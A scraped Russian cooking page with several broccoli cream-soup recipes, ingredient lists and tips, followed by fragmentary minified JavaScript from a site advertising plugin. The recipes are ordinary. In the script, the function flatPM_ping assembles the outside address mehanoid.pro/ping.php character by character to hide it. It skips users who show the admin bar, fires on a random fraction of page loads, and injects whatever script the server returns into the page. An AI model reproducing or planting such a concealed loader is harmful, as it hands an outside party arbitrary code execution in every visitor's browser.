Суп-пюре из брокколи

Суп-пюре из брокколи

В данной теме наши авторы делятся самыми удачными рецептами приготовления супов-пюре из брокколи с пошаговыми фотографиями и инструкциями. Хотите знать, как приготовить крем-суп из брокколи быстро и вкусно? Мы подскажем!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты крем-супов из брокколи

Ингредиенты

Капуста Брокколи – 500 г

Куриная грудка – 200 г

Лук репчатый – 1 шт.

Масло растительное – 2 столовые ложки

Сливки (10%) – 150 мл.

Плавленный сыр – 150 г

Зелень укропа – по вкусу

Черный молотый перец – по вкусу

Ингредиенты

Брокколи – 200 г

Цветная капуста – 200 г

Картофель – 160 г

Репчатый лук – 100 г

Чеснок – 1-2 средних зубчика

Бульон (куриный, овощной) – 0,5 л

Оливковое масло – 30 г

Сливочное масло – 30 г

Ингредиенты

Брокколи – 400 г

Мускатный орех – 5 г

Сливочное масло – 1 ст.л.

Лук репчатый – 1 шт.

Соль и черный молотый перец – по вкусу

Ингредиенты

Брокколи – 500 г

Картошка – 150 г

Кокосовое молоко – 100 мл

Креветки, соль – по вкусу

Ингредиенты

Куриный бульон (вода) – 250 мл

Картофель – 2 шт.

Брокколи – 100 грамм

Чечевица – 2 ст.л.

Соль – 2 щепотки

Ингредиенты

Брокколи – 400-500 г

Шпинат по желанию – 150-200 г

Чеснок – 1 зубчик

Куриный бульон или вода – 1,2 л

Прованские травы – 2 щепотки

Растительное масло – для жарки

Для подачи по желанию:

Сыр с голубой плесенью – 50 г

Кусочки куриного мяса – 300 г

Измельченные орехи грецкие, кешью .

Ингредиенты

Картофель – 300 г

Брокколи – 300 г

Паприка – по вкусу

Перец – по вкусу

Тыквенные семечки – по желанию

Ингредиенты

Брокколи замороженная – 500 г

Фасоль консервированная – 1 банка

Морковь – 0,5-1 шт.

Лук – 0,5-1 головка

Бульон или вода – 1-1,2 л

Оливковое масло для жарки

Соль и специи – по вкусу

Ингредиенты

Брокколи – 500 г

Картошка – 125 г

Сливки жирностью выше 30% – 200 мл

Приправы – по вкусу

Ингредиенты

Брокколи – 400 г

Сыр плавленый – 125 г

Сыр твердый – 50 г

Вода – по потребности

Ингредиенты

Филе белой рыбы – 300 г

Брокколи – 200 г

Цветная капуста – 200 г

Зеленый лук – по вкусу

Перец – по вкусу

Ингредиенты

Куриная грудка – 150 г

Брокколи – 200 г

Лук репчатый – 1 шт.

Ингредиенты

Куриное филе – 150 г

Брокколи – 200 г

Лук репчатый – 0,5 шт.

Чеснок – 1 зубчик

Укроп – несколько веточек

Перец ч.м. – по вкусу

Поделитесь подборкой рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Суп-пюре из брокколи

Брокколи, к сожалению, не очень популярный продукт. Хотя, в последнее время эта замечательная капуста набирает популярность и обретает все больше поклонников. Супчики из брокколи не очень любят в основном из-за особенного чуть серного запаха, но его можно уменьшить, добавив щепотку пищевой соды во время приготовления.

Супы-пюре можно сделать как летние, так и превратить их в ароматные осенние уютные, добавив, например, сливок, сыра, хрустящих гренок, мускатного ореха, семечек или орехов.

  • Общее время готовки – 0 часов 30 минут
  • Активное время готовки – 0 часов 20 минут
  • Стоимость – очень экономно
  • Калорийность на 100 гр – 58 ккал
  • Количество порций – 4 порции

Выбери, куда сохранить рецепт:

Хотите сохранить себе этот рецепт?
Выберите, куда:

Как приготовить суп-пюре из брокколи

Ингредиенты:

  • Брокколи – 450 г
  • Бульон – 3 чаш.(250 мл) либо овощной, либо куриный
  • Масло растительное – 1 ст.л.
  • Лук репчатый – 1 шт. средняя по размеру луковица
  • Картофель – 1 шт. крупный
  • Соль – по вкусу
  • Багет – 0.5 шт. для гренок
  • Семечки тыквенные – по вкусу для подачи супа
  • Сливки – по желанию
  • Перец черный – по вкусу
  • Шпинат – по желанию

Приготовление:

Готовить суп будем из 450 гр брокколи. Такое количество я выбрала потому, что эта стандартный вес упаковки замороженной брокколи. Размораживать для супа капусту необязательно, все равно мы будет добавлять ее в горячий уже бульон.

Для начала очистить луковицу, мелко ее нашинковать.

Обжарить лук до золотистого цвета в сотейнике на растительном масле.

Пока лук обжаривается, вымыть, почистить картофель и не крупно его нарезать.

К обжаренному золотистому луку добавить нарезанный картофель.

Обжаренный в масле лук и картофель залить горячим бульоном. Можно выбрать куриный, мясной или овощной бульон. И лучше добавлять его именно горячим, чтобы не сбивать температуру блюда. Довести бульон с овощами до кипения, огонь убавить и варить суп дальше до мягкости картофеля на среднем огне.

Как только картофель будет готов, высыпать в сотейник соцветия брокколи. Снова довести суп до кипения и варить еще буквально 3-5 минут до мягкости капусты.

Свой изумительный яркий зеленый цвет брокколи, конечно, потеряет, но можно добавить для сохранения цвета шпинат.

Также на этом этапе можно добавить в суп подогретые сливки для более мягкого сливочного вкуса.

Суп посолить и поперчить по вкусу, пюрировать погружным блендером.

Перед подачей добавить тыквенные семечки.

Хорошо к такому супу подать сухарики или домашние гренки: обжарить в небольшом количестве растительного масла ломтики белого хлеба. Для гренок лучше выбирать длинные узкие багеты. Можно гренки также присыпать тертым сыром и поставить их под гриль, чтобы сыр расплавился.

Очень хорошо будет к осеннему супу добавить полоску хрустящего, обжаренного на сухой сковороде бекона. Аромат дымка его очень украсит, а бекон сделает немного сытнее.

Такие супы пюре хорошо согревают, насыщают. И, приготовив такой супчик один раз, хочется экспериментировать и дальше.

Готовим суп-пюре из брокколи: лучшие рецепты

Сорт цветной капусты, внешне напоминающий маленькое зеленое деревце, знаком всем. Существует огромное количество рецептов, где продукт выступает главным или составляющим ингредиентом. Соцветия варят, тушат, жарят, парят, употребляют в сыром виде. Самое нежное блюдо из брокколи – это суп-пюре. Предлагаем ознакомиться с его самыми популярными рецептами.

Суп-пюре из брокколи по-французски

  • 500 г брокколи;
  • 1 л воды;
  • 1 репчатый лук;
  • 4 моркови;
  • 30 г сливочного масла;
  • 1 долька чеснока;
  • 4 бульонных кубика;
  • 2 ст. молока;
  • 3 ст. л. муки;
  • ¼ ст. ледяной воды;
  • 1 ст. л. соевого соуса;
  • перец черный;
  • петрушка.
  1. Все овощи предварительно моем и очищаем. Нарезаем лук, морковь, ножки брокколи достаточно мелко. Чеснок давим, соцветия капусты разбираем.
  2. Разогреваем на сковороде сливочное масло. В нем около пяти минут тушим морковь с ножками, луком и чесноком. Иногда помешиваем, чтоб не подгорело.
  3. Берем трёхлитровую кастрюлю, наливаем туда воду. Когда она начинает закипать, разводим в ней кубики бульона. Варим тушеные овощи и соцветия до тех пор, пока они не станут мягкими. Это может занять 20 минут.
  4. Готовое горячее блюдо измельчаем в блендере с молоком, отправляем назад на медленный огонь.
  5. Ледяную воду наливаем в муку, создаем однородную массу.
  6. Эту смесь понемногу наливаем в суп, в процессе хорошо мешаем.
  7. Заправляем перцем, соусом. Если вам не нравится соус, замените его солью. Снимаем с огня.
  8. Перед подачей на стол украсьте блюдо петрушкой.

Сливочный крем-суп из брокколи

  • 1 литр куриного бульона;
  • 1 кг брокколи;
  • луковица;
  • стакан сливок;
  • чеснок;
  • 3 ложки растительного масла;
  • перец, соль.
  1. Луковицу с чесноком очищаем, нарезаем, обжариваем на масле.
  2. В кастрюлю кладем порезанную капусту, лук, чеснок, специи. Тушим на маленьком огне.
  3. Отдельно разогреваем бульон. Заливаем им полуготовые овощи. Довариваем.
  4. Все измельчаем блендером и перемешиваем с прогретыми сливками.
  5. Готовый суп-пюре можно украсить грецкими орехами, зеленью или сухариками.

Сырный суп-пюре с брокколи

  • 1 кг капусты;
  • 250 г сыра, который плавится;
  • 3 стакана куриного бульона;
  • луковица;
  • морковь;
  • 2 дольки чеснока;
  • 1 стакан молока;
  • 1/3 ст. муки;
  • 3 ст. л. масла растительного;
  • специи (соль, перец) на вкус.
  1. Мелко нарезаем морковь, лук, чеснок, ножки капусты, соцветия просто разбираем.
  2. Морковь с луком, чесноком обжариваем на масле.
  3. В молоке растворяем муку, чтоб не было комков. Сыр натираем.
  4. В кастрюлю наливаем бульон кладем жареные овощи с капустой. После того как забурлило, варим ещё в течение 10 минут.
  5. Потом вливаем молоко с мукой. Мешаем до густоты пять – восемь минут.
  6. Заправляем специями.
  7. Выключаем огонь, насыпаем в кастрюлю сыр. Перемешиваем.
  8. Взбиваем все блендером.

Суп-пюре с курицей и брокколи

  • 350 грамм филе курицы;
  • 300 грамм брокколи;
  • 2 моркови;
  • луковица;
  • 3 картофеля;
  • 200 грамм сливок;
  • сухарики;
  • сыр пармезан.
  1. Куриное филе моем, кладем в кастрюлю, заливаем 1,5 литрами воды. Варим до готовности, примерно 35 минут.
  2. Готовое мясо вынимаем, нарезаем кубиками и откладываем отдельно в мисочку.
  3. Нарезанный лук и натертую морковь жарим на масле.
  4. Нарезаем картофель брусочками, а капусту небольшими кусочками.
  5. Закладываем овощи в бульон, солим, перчим. Варим до готовности.
  6. Взбиваем все блендером и снова отправляем пюре на маленький огонь. Помешивая, вливаем сливки.
  7. Готовый суп наливаем в тарелки и посыпаем тертым сыром и сухариками.
Читать еще:  Банановое мороженое

Суп-пюре с брокколи и кабачками

  • литр мясного бульона;
  • полкило брокколи;
  • 3 картофеля;
  • репчатый лук;
  • кабачок;
  • 2 ложки масла сливочного;
  • 3 ложки сметаны;
  • специи для вкуса.
  1. Мясной бульон готовится обычным способом.
  2. Все овощи нарезаем некрупно. Соцветия капусты разбираем на небольшие части.
  3. Лук поджариваем на масле.
  4. Все ингредиенты кладем в бульон, варим до готовности, пока овощи не размягчатся.
  5. В конце добавляем специи, сметану.
  6. Измельчаем суп до состояния пюре блендером.
  7. Разливаем и подаем горячим в глубоких мисочках, присыпав сверху зеленью или сухариками.

Полезные советы

  • Замороженная брокколи имеет те же свойства, что и свежая, но перед обработкой их нужно разморозить.
  • Замороженный продукт варится быстрее. Учитывайте это, чтобы капуста не превратилась в кашу раньше времени.
  • Любой суп-пюре из брокколи нужно заправлять сливками, сливочным маслом или сыром.
  • Если используете свежую капусту, выбирайте мелкие закрытые соцветия ярко-зеленого цвета с упругим стеблем;
  • Хранить овощ нужно отдельно в закрытом пищевом пакете в холодильнике;
  • Перед приготовлением соцветия обязательно нужно промыть под проточной водой;
  • В качестве украшения блюда можно применить зелень, сухарики, морепродукты, вареные яйца.

Легкие, нежные супы приятно удивят вас своей консистенцией, ароматом и вкусом. Употребляйте полезное блюдо в горячем виде и будьте здоровы!

Суп-пюре из брокколи

Суп-пюре из брокколи – это отличный легкий суп, который можно быстро приготовить в домашних условиях. Этот суп отличается низкой калорийностью, а благодаря сливкам приобретает приятный и нежный вкус.

Попробуйте приготовить суп-пюре из брокколи по нашему пошаговому рецепту с фото. Будет Вкусно!

Ингредиенты

  • Брокколи – 700 г
  • Картофель – 4 шт
  • Лук – 1 шт
  • Морковь – 1 шт
  • Чеснок – 2 зубка
  • Сливки нежирные – 100 мл
  • Растительное масло – для жарки
  • Соль и специи – по вкусу

Калорийность

Приготовление:

Шаг 1

Подготавливаем продукты для супа, разделяем брокколи на веточки, чистим картошку, морковку, лук и чеснок. Специи можно взять на свой вкус. Мы использовали орегано и молотый перец.

Шаг 2

Картошку нарезаем кубиками, заливаем водой, чтобы прикрыла картошку. Ставим вариться.

Шаг 3

Добавляем брокколи минут через 15 после закипания картошки, подливаем при необходимости воду и варим все вместе до готовности картошки.

Шаг 4

Нарезаем брусочками лук, рубим чеснок. Морковь трем на терке.

Шаг 5

Обжариваем на растительном масле лук до золотистого цвета.

Шаг 6

Добавляем к луку чеснок и морковку. Обжариваем все вместе.

Шаг 7

Сливаем большую часть жидкости в отдельную емкость. Овощной отвар может потом пригодиться, чтобы довести суп до нужной консистенции.

Шаг 8

Пюрируем суп при помощи блендера.

Шаг 9

Вливаем сливки и тщательно перемешиваем. Если суп кажется слишком густым, можно добавить овощной отвар или подлить еще сливок. Солим суп по вкусу и добавляем любимые специи.

Шаг 10

Разливаем суп по тарелкам и подаем к столу. По желанию его можно присыпать обжаренным кунжутом или добавить сухарики. Получится еще вкуснее. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};